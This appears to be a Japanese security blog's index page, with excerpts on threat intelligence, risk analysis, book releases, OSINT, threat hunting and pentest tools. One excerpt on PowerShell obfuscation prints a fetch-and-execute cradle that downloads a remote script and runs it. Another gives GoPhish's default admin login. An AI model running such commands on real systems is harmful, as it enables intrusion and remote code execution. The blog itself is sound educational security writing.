はてなブックマーク

『マスタリングGhidra ―基礎から学ぶリバースエンジニアリング完全マニュアル 単行本』（オライリージャパン）が、５月２７日発売されます。 www.oreilly.co.jp 発売に先駆けて見本誌をいただきました！ Ghidraとは？ Ghidraとは、NSA（米国国家安全保障局）が開発したリバースエンジニアリングソフトウェアであり、2019年に公開され、デファクトスタンダードのツールであるIDA Proにも機能面で同等の豊富さを持っていることから話題になったツールです。 マスタリングGhidraとは？ 本書（原題：The Ghidra Book: The Definitive Guide）は、『The IDA Pro Book』の著者であるChris Eagle氏と、コンピュータサイエンスの教授であるKara Nance氏によってかかれた本で、一言でいえばGhidraの全てが記載されて

（久しぶりの更新になりますが）あけましておめでとうございます。本年もよろしくお願いします。 既に、多くの方にTwitterでリツイートや「いいね」をいただいたり、予約した、購入した*1と嬉しいご連絡をいただいていますが、1/19に技術評論社様より拙書『脅威インテリジェンスの教科書』が発売されます。 私が、Twitterを情報収集用として使っており、ほとんど発信用には全く使っていないので、Tweetにはあまり反応できていないのはご容赦ください。ささやかに「いいね」やらリツイートはしています。 gihyo.jp 【新刊】2022年1月19日発売『脅威インテリジェンスの教科書』本体3,600円＋税、石川朝久　著　脅威インテリジェンスを理論と実務の両面から解説！ https://t.co/UiFMzUE7Q1 pic.twitter.com/o4DakDq6Xa — 技術評論社販売促進部 (@gi

最近、いくつか新しいフレームワークが登場しており、その概要をまとめました。 D3FEND Matrix MITRE社より、新しいフレームワーク D3FEND Matrix が登場しました。 d3fend.mitre.org MITRE社のフレームワークといえば、MITRE ATT&CK MatrixやActive Defense Matrix（MTIRE SHIELD）が有名ですが、D3FEND Matrixは、NSAが研究資金を提供し、MITREが開発したフレームワークです。 www.nsa.gov このフレームワークでは、一般的な攻撃手法への対抗モデルを提供し、防御手法が攻撃者の攻撃能力にどのように影響するか、記述されています。 ここでは、少し構成を見ていきましょう。 D3FENDフレームワークは、大きく５種類のTacticsで構成され、その下にサブ項目（Sub-Tactics）、そし

Internet Week 2020で『C12：脅威インテリジェンスの実践的活用法』というタイトルで講演をしてきましたので、講演資料を公開します。 スライドは以下で公開されていますので、よろしければご参照ください。（Internet Week 2020） 過去実施した金融ISACの講演をベースとしながら、最近様々研究を進めているBAS（Breach & Attack Simulation）についても解説を行いました。 Internet Week 2020：C12 脅威インテリジェンスの実践的活用法 from Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE www2.slideshare.net

翻訳本『初めてのマルウェア解析～Windowsマルウェアを解析するための概念、ツール、テクニックを探る ～』（オライリージャパン）の発売日が１２月１５日に決定しました！！ 初めてのマルウェア解析 ―Windowsマルウェアを解析するための概念、ツール、テクニックを探る 作者:Monnappa K A 発売日: 2020/12/15 メディア: 単行本（ソフトカバー） 本書は、 Cisco Systems社のエンジニア Monnappa K A氏の著書『Learning Malware Analysis』の翻訳本です。私が翻訳を担当し、北原さん、中津留さんに技術監修をご担当いただきました。 Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Wind

2015年頃に脅威インテリジェンスという概念に出会ってから、色々調べて、講演・ブログで調査結果や自分の考えを公開してきましたが、一度その内容を体系的な資料として整理したいと考え、『脅威インテリジェンスの教科書』という形で執筆・整理したので、公開します。 脅威インテリジェンスの教科書 from Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE www.slideshare.net 先日公開した金融ISACの講演では、時間制約上、概要しかお話しできませんでした。それぞれの内容について、より詳細が知りたいという方は上記資料をご覧ください。 www.scientia-security.org なにかのご参考になれば幸いです。

先日オンラインで開催された『金融ISAC アニュアルカンファレンス 2020』において、『2019年度金融ISACアワード（個人賞）』を頂戴しました。ありがとうございます！！ 受賞に伴い、アワード受賞記念講演として、『Intelligence Driven Securityの＜ことはじめ＞』と題して、脅威インテリジェンスの活用についてお話させていただきました。金融ISACはクローズドなカンファレンスのため、講演は会員企業に限定されますが、資料の共有について、金融ISACと会社の許可が下りましたので公開します。 金融ISAC アニュアルカンファレンス 2020：Intelligence Driven Securityの「ことはじめ」 www.slideshare.net 今回の講演では、これから脅威インテリジェンスの活用を開始する金融機関を想定し、脅威インテリジェンスの分類や、活用手法などに

セキュリティの世界にいると、「リスク分析」や「リスクベースアプローチ」という単語を非常によく耳にします。「リスク」という概念は、セキュリティに限らず様々な局面において登場しますが、意外とその定義は難しく、明確なイメージを持っている人は少ないと思います。 今回は、様々な学術的知見や各種標準をみながら、「リスク」への理解を深めたいと思います。 リスクの定義 まず、リスクの定義について探ってみましょう。ISO/IEC 27005 Information Security RIsk Managementによれば、Information Security Riskによると、以下のように定義されています。 The potential that a given threat will exploit vulnerabilities of an asset or group of assets and t

（追記）2019年02月12日に追記を行いました。 リスク分析は、セキュリティ戦略策定の上で欠かせない基本的なアプローチです。 以前、日経SYSTEMSの記事「セキュリティコスト ５つの掟」（2018年10月号）にて、 一部のインタビュー記事が紹介されましたが、そこで取り扱われたリスク分析の考え方について、自分の考え方について少し整理をしておきたいと思います。 tech.nikkeibp.co.jp リスク分析の概要 リスク分析とは、基本的に以下のステップで行います。 セキュリティ対策の現状把握を行い、現時点のリスクを特定・把握する。 対策の優先度を決定する。 対策の実装に向けたロードマップを策定する。 セキュリティ予算・リソースは通常有限であり、足りないことが一般的ですので、この分析をしてその年にやるべき対策を決定するのが主なスコープです。 セキュリティ対策の現状把握 リスク分析を行う際

Equifax情報漏洩事件とは、Apache Strutsの脆弱性を悪用され、約1.5億件のレコードが漏洩した事件で、史上TOP10入りする規模のインシデントです。この事件については、その規模や攻撃ベクタが顕著であることもあり、色々学ぶべき点が多いインシデントだと考えています。 2018年12月19日に、米国下院監査政府改革委員会（The US House of Representatives Committee on Oversight and Government Reform）がEquifaxに関する包括的なレポートを公開しました（その後、トランプ政権によるGovernment Shutdownの影響でアクセスできないようになっていましたが、現在はアクセスできるようです）。 非常に面白いレポートであるため、条件付き翻訳を行いました。 Google翻訳を下訳として、その後人間による翻訳

OSINT（Open Source Intelligence）は、公開情報から様々な情報を集める技術です。 最近では、@Sh1ttyKids氏がOSINT技術を活用して日本のアンダーグランドコミュニティの情報をまとめています。 www.recordedfuture.com 年始にかけて、すこしOSINT技術を調査していたので、ご参考になれば参考です。 翻訳：2019 OSINT Guide 『2019 OSINT Guide』とは、Tek氏により書かれた2019年１月に書かれた記事です。 www.randhome.io 米国のセキュリティクラスタでは話題になっており、OSINT技術の概要を眺め、また最先端のツールなどが紹介されているので、一読の価値はあると思い、作者の許可を得て、翻訳を行いました。 scientia-security.github.io RAND研究所のレポートから見るOS

管理コストを下げるためにOffice 365の採用を行う企業も増えていると思いますが、その一方Office 365に対する攻撃も様々増えています。有名なところだと、産総研や明治大学が挙げられると思います。www.nikkei.com www.nikkei.com 翻訳：O365への侵入増加と防御方法について 2018年12月に、英国国立サイバーセキュリティセンター（NCSC）からOffice 365に関する攻撃手法と防御手法についてまとめられていた資料が発表されました。 www.ncsc.gov.uk その翻訳を以下に公開しています。（翻訳の一覧はコチラ！！） scientia-security.github.io 本ドキュメントを読んでいただければわかりますが、対策内容としては普通で当たり前、また最低限の内容に限定されています。しかし、Office 365のセキュリティ対策を不安に感じて

以前の記事でCISOの役割という記事を書きました。 しかし、最近いくつかドキュメントを読み少し更新できること、また以前紹介したCISO Mind Mapの日本語を作成したのでそれを紹介したいと思います。 www.scientia-security.org CISOに関するフレームワーク 前回の記事でも書きましたが、CISOの役割は様々あります。端的に言ってしまえば、以下の３点を持っていれば最強のCISOになれるでしょう。 要件１：ビジネスがわかる（CEO的役割） 要件２：技術がわかる（CTO的役割） 要件３：セキュリティがわかる（GRC的役割） しかしそれではCISOが何をすべきかわからないため、最新のフレームワークについて詳しく見ていきましょう。いろんなフレームワークがありますが、組織にあうフレームワークを選べばよいと思います。 フレームワーク１：CISO Mind Map 前回も紹介し

先日、US-CERTからサイバー犯罪に利用される公開ツールに関するアナウンスが出されました。 Publicly Available Tools Seen in Cyber Incidents Worldwide | US-CERT ITMediaにも取り上げられていますが、比較的面白い記事だったので勝手に翻訳してみました。（アメリカ合衆国政府機関の著作物はパブリックドメインとして扱われるので翻訳して公開しても問題ないと判断しています。間違っていたら教えてください。） www.itmedia.co.jp 利用に際する注意事項は以下の通りです。 翻訳上の誤りは多々あると思いますが、自己責任でご活用ください。 記事の意図を反映するため、意訳をしているケースが多々ありますし、省略したり追加で言葉を添えている場合があります。 いまいち意図がわからない文章もあったので、その場合は推測で訳をしている場合

金融庁より、TLPT（Therat-Lead Penetration Test）というキーワードが登場してきています。また、TIBER（Threat Intelligence Based Ethical Red Teaming）という概念が欧州系金融系を中心に話題になっています。 今回は、その動向と読むべき資料について整理をしたいと思います。 背景 2018年7月に発表されたNISC（内閣サイバーセキュリティセンター）の「サイバーセキュリティ戦略2018」では以下のように言われており、「脅威ベースのペネトレーションテスト」が登場しています。 金融庁において、大規模な金融機関に対して、そのサイバーセキュリティ対応能力をもう一段引き上げるため、「脅威ベースのペネトレーションテスト（テスト対象企業ごとに脅威の分析を行い、個別にカスタマイズしたシナリオに基づく実践的な侵入テスト）」等、より高度な評

Cyber Threat IntelligenceやThreat Actor Attributionの観点では、悪性ドメイン（C2ドメイン）は足が速い（すぐに変わる）のでDNSデータ分析は重要な要素となります。 例えば、マルウェア解析チームにより特定のC２通信を発生させていたと報告してきたとします。その際に、そのDNSの接続先はどこなのか、そのC2ドメインを設定した人物は誰なのか、その攻撃者の意図を分析するThreat Actor Attributionなどでも、DNS情報の分析は行います。今回は、そのThreat Intelligenceの観点から見るDNSデータについて解説します。 Active vs. Passive Cyber Threat Intelligenceの観点では、DNS情報としては、現在最新のデータより、過去のデータに価値があります。なぜなら、インシデント分析をしてい

#ssmjp ４月に参加してきました。 ブログ枠で参加したのでアップデートしました。（勘違いして、アップロードできていなかったので、アップロードしました。ご迷惑をおかけしました。） 講演１：私の情報収集法 最初のスピーカーは「タイムライン・インテリジェンス」という情報収集法に関する話でした。「私は昨晩、6時間寝てしまったから、すでに専門家でなくなってしまった」とまで言い切らずに情報収集を行うというコンセプトが面白かったです。 提案されていたポイントは、「時差を利用して、過去・未来にさかのぼるイメージで情報収集を行う」という点にあるかと思います。 未来の話題は、海外ソースで先取り 過去の話題は、「まとめ」を活用 未来の話題 海外の情報で日本で話題になるまでに先取りを行って、話題を先取りする方法です。 海外のニュースは日本の夜に公開されており、翻訳は大体翌日の午前中に公開されるため、朝の通勤電

（修正履歴） 過去のエントリをいろいろ改善して再投稿しました。 2019年2月9日に一部更新を行いました。 今回のエントリーでは、Cyber Threat Intelligence（CTI）について解説をしていきます。 第１回では、Cyber Threat Intelligenceの概要について定義していきたいと思います。 Intelligenceとは何か？ インテリジェンスとは、諜報活動や情報分析に関する軍事用語です。 諜報機関として有名なCIA（Central Intelligence Agency）はアーカイブ上で過去の資料（コレとかコレ）を複数公開していますが、少し古く、議論が尽くされていないと筆者は考えています。本書では、アメリカ統合参謀本部（JCS：Joint Chiefs of Staff）が発表している資料（DOD：Dictionary of Military and As

Offensive Countermeasures（OCM）とは、2009年にSANSインストラクターであるJohn Strand氏らが提唱した概念です。当時はあまり流行した考え方ではなかったと思いますが、Threat IntelligenceやThreat Huntingへの注目と合わせて、再度注目を集めている概念です。（最近では、SEC550: Active Defense, Offensive Countermeasures and Cyber Deceptionというコースも準備されているようです。） 今日のブログでは、Offensive Countermeasureとは何か、提唱者の本をもとに読み解いてみたいと思います。 Offensive Countermeasures: The Art of Active Defense (English Edition) 作者: John

2018/01/09 金融庁関連の話題を追加しました。 少し前ですが、２０１７年８月にJPCERT/CCが「Web サイトへのサイバー攻撃に備えて」という報告を発表して、セキュリティ診断・ペネトレーションテストの頻度について言及をしています。今回は、各レギュレーションがどのようについてどのように言及しているか整理を行いました。 今回は、各レギュレーションがどのようにセキュリティ診断の頻度を定めているか整理したいと思います。 各レギュレーションが定義する頻度 各レギュレーションが定義する脆弱性スキャン・ペネトレーションテストの頻度は以下の通りです（間違っていたらすいません）。これを見ると、少なくても年１回はペネトレーションテストをすることが求められていると考えられます。 JPCERT/CC JPCERT/CCは、「Web サイトへのサイバー攻撃に備えて」にて以下のように定義しています。この規

CISSP（Certified Information Systems Security Professional）という試験は、セキュリティの経験と全般的な知識を持っていることを示す資格です。一般的かつセキュリティと重要な資格である一方、独学用の勉強リソースはあまり多くないと言わざるを得ません。また、CISSPのセミナーはかなり高額であるため、あまり気軽に参加できるものではありません。 ふと知り合いに聞かれたので、自分の経験を踏まえ変えてみたいと思います。 Shon Harrisシリーズ 個人的にはShon Harris女史の著作をお勧めしています。米国滞在時でもかなりバイブル的な存在として名前が挙がる著作でした。私は、問題集のほうを中心にやりましたが、教科書もかなり良い出来だと思います。 CISSP All-in-One Exam Guide, Seventh Edition 作者:

PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t") PowerShellの難読化技法については様々な研究がされており、いくつかツールが存在します。今回はそれを紹介します。 Invoke-Obfuscation Invoke-Obfuscationは、任意のPowerShellコマンドを難読化してくれるツールです。 github.com GitHubに記載されている通り、インストールします。 起動すると以下のような画面になります。 Tutorialコマンドをたたくと以下のように使い方を教えてくれま

以前、ソーシャル・エンジニアリング系のコミュニティにてGoPhishというオープン・ソースのフィッシングフレームワークを教えてもらい、なかなか使えるという評判を聞いていました。最近やっと検証する機会ができたので、検証結果をまとめています。 なお、User Guideも用意されているのでその通りに使えば簡単に使うことができます。 インストール サイトからダウンロードするだけです。Windows用のバイナリもあり、実行するとサーバが立ち上がります。 getgophish.com その後、localhost:3333にアクセスすると管理コンソールが立ち上がりますので、以下のデフォルトアカウントでログインします。（管理コンソールのポート番号は設定で自由に変えられます。また、GitHubに乗っているアカウントは間違っているので注意が必要です。） ユーザ名：admin パスワード：gophish ログ

ペネトレーション・テスターの技術力を見る上で、「資格」が一つの基準として利用されています。 日本では、SANSのGPEN*1やGWAPT*2が一番有名かと思いますが、この記事では米国の資格事情をご紹介しようと思います。（評価には個人の意見がかなり含まれていますので、その点はご容赦ください。） 米国でポピュラーであるペネトレーション・テスターの資格は大きく３種類あります。 CEH : Certified Ethical Hacker GIAC : Global Information Assurance Certification OSCP : Offensive Security Certified Professional CEH : Certified Ethical Hacker 米国で一番ポピュラーなペネトレーション・テスターの資格が、このCEHだと思います。米国でのセキュリティ・

昔からセキュリティ製品評価をしていると、自動遮断・自動連携など自動化のうたい文句にしていることが非常によくあります。最近は米国のカンファレンスに頻繁に参加していますが、多くの製品のキーワードとして「自動化」は目玉機能として紹介されます。 しかしながら、実際に評価してみると、かなり怪しい検知でも平気で連携・遮断されるし、誤判定が多かったり、きちんと連携されていない製品もあり、米国の導入企業実績などを聞くと、「よくこの怪しい自動化機能を使っているよな？」と思ったことが良くありました。（もちろん驚くべきほどうまく設計された自動化機能もありますので、一概には言えませんが） 個人的には、攻撃を自動遮断したり、検知した内容をもとに他のセキュリティ製品に設定を自動的に連携する技術はクイック・レスポンスを期待できるものの、不用意にユーザの通信を止めてしまうなど、ユーザ・ビジネスに影響を与えかねない危険な手

Threat Huntingという概念をご存知でしょうか？ 一言で言えば、「高度な標的型攻撃を検知・対応するための方法論」ですが、2015年度ごろから米国のカンファレンス等でよく耳にする単語です。しかしながら、Threath Huntingについて体系的に学べる資料がないため、しばらくの間学んだことをまとめて、Threat Huntingへの理解を深めたいと思います。 第１回目は、UEBA製品で有名なSqrrl社の記事を元に、２種類のキーワードを取り上げます。 A Framework for Cyber Threat Hunting Part 1: The Pyramid of Pain Enterprise Detection & Response: The Pyramid of Pain キーワード１：IOC IOC（Indicator of Compromise）とは、以下のようにに

先日つたない記事を書いたところ、（このブログとしては）すごい反響をいただきました（かなりこっそりやっていて誰も見ているとは思わなかったので）。ペネトレーション・テストにみんな関心があるんだなと思い、もうひとつ記事を書こうと思います。 www.scientia-security.org 今回焦点を当てるのは、米国でどんなペネトレーション・テストのツールです。色々な講演を聞いたりしていく中で、米国ではどんなツールが使われているのかその事情がわかってきたので、そのリストを公開したいと思います。 なお、以下の２つの基準をもとに独断と偏見で選定しています。 講演・ネットワークで知り合った専門家・ベンダーの話の中で、比較的よく名前が挙がったツールを選択する。（スマートフォン系は自分がそもそもをよくわかっていないので除外。） 自分が知らなかったツールを選択する（３年前ぐらいからプロジェクト管理などに主軸